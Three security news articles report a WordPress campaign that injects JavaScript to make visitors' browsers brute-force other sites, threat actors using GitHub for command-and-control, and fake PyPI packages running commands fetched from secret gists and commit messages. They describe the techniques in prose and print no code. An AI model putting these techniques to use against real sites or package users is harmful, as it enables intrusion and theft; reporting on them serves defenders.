Mar 07, 2024NewsroomVulnerability / Web Security

Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.

The attacks, which take the form of distributed brute-force attacks, “target WordPress websites from the browsers of completely innocent and unsuspecting site visitors,” security researcher Denis Sinegubko said.

The activity is part of a previously documented attack wave in which compromised WordPress sites were used to inject crypto drainers such as Angel Drainer directly or redirect site visitors to Web3 phishing sites containing drainer malware.

The latest iteration is notable for the fact that the injections – found on over 700 sites to date – don’t load a drainer but rather use a list of common and leaked passwords to brute-force other WordPress sites.

The attack unfolds over five stages, enabling a threat actor to take advantage of already compromised websites to launch distributed brute-force attacks against other potential victim sites –

• Obtaining a list of target WordPress sites
• Extracting real usernames of authors that post on those domains
• Inject the malicious JavaScript code to already infected WordPress sites
• Launching a distributed brute-force attack on the target sites via the browser when visitors land on the hacked sites
• Gaining unauthorized access to the target sites

“For every password in the list, the visitor’s browser sends the wp.uploadFile XML-RPC API request to upload a file with encrypted credentials that were used to authenticate this specific request,” Sinegubko explained. “If authentication succeeds, a small text file with valid credentials is created in the WordPress uploads directory.”

It’s currently not known what prompted the threat actors to switch from crypto drainers to distributed brute-force attack, although it’s believed that the change may have been driven by profit motives, as compromised WordPress sites could be monetized in various ways.

That said, crypto wallet drainers have led to losses amounting to hundreds of millions in digital assets in 2023, according to data from Scam Sniffer. The Web3 anti-scam solution provider has since revealed that drainers are exploiting the normalization process in the wallet’s EIP-712 encoding procedure to bypass security alerts.

The development comes as the DFIR report revealed that threat actors are exploiting a critical flaw in a WordPress plugin named 3DPrint Lite (CVE-2021-4436, CVSS score: 9.8) to deploy the Godzilla web shell for persistent remote access.

It also follows a new SocGholish (aka FakeUpdates) campaign targeting WordPress websites in which the JavaScript malware is distributed via modified versions of legitimate plugins that are installed by taking advantage of compromised admin credentials.

“Although there have been a variety of maliciously modified plugins and several different fake-browser update campaigns, the goal of course is always the same: To trick unsuspecting website visitors into downloading remote access trojans that will later be used as the initial point of entry for a ransomware attack,” security researcher Ben Martin said.

Jan 11, 2024NewsroomCybersecurity / Software Security

The ubiquity of GitHub in information technology (IT) environments has made it a lucrative choice for threat actors to host and deliver malicious payloads and act as dead drop resolvers, command-and-control, and data exfiltration points.

“Using GitHub services for malicious infrastructure allows adversaries to blend in with legitimate network traffic, often bypassing traditional security defenses and making upstream infrastructure tracking and actor attribution more difficult,” Recorded Future said in a report shared with The Hacker News.

The cybersecurity firm described the approach as “living-off-trusted-sites” (LOTS), a spin on the living-off-the-land (LotL) techniques often adopted by threat actors to conceal rogue activity and fly under the radar.

Prominent among the methods by which GitHub is abused relates to payload delivery, with some actors leveraging its features for command-and-control (C2) obfuscation. Last month, ReversingLabs detailed a number of rogue Python packages that relied on a secret gist hosted on GitHub to receive malicious commands on the compromised hosts.

While full-fledged C2 implementations in GitHub are uncommon in comparison to other infrastructure schemes, its use by threat actors as a dead drop resolver – wherein the information from an actor-controlled GitHub repository is used to obtain the actual C2 URL – is a lot more prevalent, as evidenced in the case of malware like Drokbk and ShellBox.

Also rarely observed is the abuse of GitHub for data exfiltration, which, per Recorded Future, is likely due to file size and storage limitations and concerns around discoverability.

Outside of these four main schemes, the platform’s offerings are put to use in various other ways in order to meet infrastructure-related purposes. For instance, GitHub Pages have been used as phishing hosts or traffic redirectors, with some campaigns utilizing a GitHub repository as a backup C2 channel.

The development speaks to the broader trend of legitimate internet services such as Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, Trello, and Discord being exploited by threat actors. This also includes other source code and version control platforms like GitLab, BitBucket, and Codeberg.

“There is no universal solution for GitHub abuse detection,” the company said. “A mix of detection strategies is needed, influenced by specific environments and factors such as the availability of logs, organizational structure, service usage patterns, and risk tolerance, among others.”

Dec 19, 2023The Hacker NewsSoftware Security / Threat intelligence

Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages.

“Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools,” ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News.

“But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware.”

Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address.

While using public sources for C2 does not make them immune to takedowns, they do offer the benefit of allowing threat actors to easily create attack infrastructure that’s both inexpensive and reliable.

This technique is sneaky as it allows threat actors to blend their malicious network traffic with genuine communications within a compromised network, making it challenging to detect and respond to threats in an effective manner. As a result, the chances that an infected endpoint communicating with a GitHub repository will be flagged as suspicious is less likely.

The abuse of GitHub gists points to an evolution of this trend. Gists, which are nothing but repositories themselves, offer an easy way for developers to share code snippets with others.

It’s worth noting at this stage that public gists show up in GitHub’s Discover feed, while secret gists, although not accessible via Discover, can be shared with others by sharing their URL.

“However, if someone you don’t know discovers the URL, they’ll also be able to see your gist,” GitHub notes in its documentation. “If you need to keep your code away from prying eyes, you may want to create a private repository instead.”

Another interesting aspect of secret gists is that they are not displayed in the GitHub profile page of the author, enabling threat actors to leverage them as some sort of a pastebin service.

ReversingLabs said it identified several PyPI packages – namely, httprequesthub, pyhttpproxifier, libsock, libproxy, and libsocks5 – that masqueraded as libraries for handling network proxying, but contained a Base64-encoded URL pointing to a secret gist hosted in a throwaway GitHub account without any public-facing projects.

The gist, for its part, features Base64-encoded commands that are parsed and executed in a new process through malicious code present in the setup.py file of the counterfeit packages.

The use of secret gists to deliver malicious commands to compromised hosts was previously highlighted by Trend Micro in 2019 as part of a campaign distributing a backdoor called SLUB (short for SLack and githUB).

A second technique observed by the software supply chain security firm entails the exploitation of version control system features, relying on git commit messages to extract commands for execution on the system.

The PyPI package, named easyhttprequest, incorporates malicious code that “clones a specific git repository from GitHub and checks if the ‘head’ commit of this repository contains a commit message that starts with a specific string,” Zanki said.

“If it does, it strips that magic string and decodes the rest of the Base64-encoded commit message, executing it as a Python command in a new process.” The GitHub repository that gets cloned is a fork of a seemingly legitimate PySocks project, and it does not have any malicious git commit messages.

All the fraudulent packages have now been taken down from the Python Package Index (PyPI) repository.

“Using GitHub as C2 infrastructure isn’t new on its own, but abuse of features like Git Gists and commit messages for command delivery are novel approaches used by malicious actors,” Zanki said.